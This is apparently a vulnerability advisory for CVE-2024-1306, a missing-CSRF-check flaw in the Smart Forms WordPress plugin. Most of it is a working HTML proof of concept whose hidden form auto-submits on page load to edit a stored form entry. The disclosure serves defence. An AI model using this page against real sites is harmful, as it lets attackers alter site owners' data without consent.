Smart Forms < 2.6.94 – Edit Entries via CSRF | CVE 2024-1306

Description

The plugin does not have CSRF checks in some places, which could allow attackers to make logged-in users perform unwanted actions via CSRF attacks, such as editing entries, and we consider it a medium risk.

Proof of Concept

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>CSRF PoC</title>
</head>
<body>
  <h1>CSRF PoC</h1>
  <form id="csrfForm" action="https://YOUR-WEBSITE-URL/wp-admin/admin-ajax.php" method="post" style="display: none;">
    <input type="hidden" name="action" value="rednao_smart_forms_edit_form_values">
    <input type="hidden" name="entryId" value="7">
    <input type="hidden" name="entryString" value="{&quot;rnField1&quot;:{&quot;value&quot;:&quot;Mr Hacker&quot;},&quot;rnField2&quot;:{&quot;value&quot;:&quot;mehdi@mtest.com&quot;},&quot;rnField3&quot;:{&quot;value&quot;:&quot;SUCCESSFUL FIELD HACK&quot;}}">
    <input type="hidden" name="elementOptions" value="[{"_id":35,"ClassName":"rednaotextinput","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"35","Type":"single"},"Id":"rnField1","Spacing":"col-sm-12","Label":"Name","Placeholder":"","Value":"","ReadOnly":"n","Width":"","Icon":{"ClassName":""},"CustomCSS":"","Placeholder_Icon":{"ClassName":"","Orientation":""},"_Selected":true},{"_id":36,"ClassName":"rednaoemail","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"37","Type":"single"},"Id":"rnField2","Spacing":"col-sm-12","Label":"Email","Placeholder":"","Icon":{"ClassName":""},"CustomCSS":"","Placeholder_Icon":{"ClassName":"","Orientation":""},"Value":"","ReadOnly":"n","_Selected":true},{"_id":37,"ClassName":"rednaotextarea","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"39","Type":"single"},"Id":"rnField3","Spacing":"col-sm-12","Label":"Message","DefaultText":"","Value":"","Width":"","Height":"","Placeholder":"","Disabled":"n","MaxLength":"","CustomCSS":"","Placeholder_Icon":{"ClassName":"","Orientation":""},"_Selected":true},{"_id":38,"ClassName":"rednaosubmissionbutton","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"41","Type":"single"},"Id":"rnField4","Spacing":"col-sm-12","ButtonText":"Send","CustomCSS":"","Icon":{"ClassName":"glyphicon glyphicon-send","Orientation":"Add"},"Animated":"y","Action":"submit","_Selected":true}]">
  </form>
  <script>
    // Automatically submit the form when the page loads
    document.getElementById('csrfForm').submit();
  </script>
</body>
</html>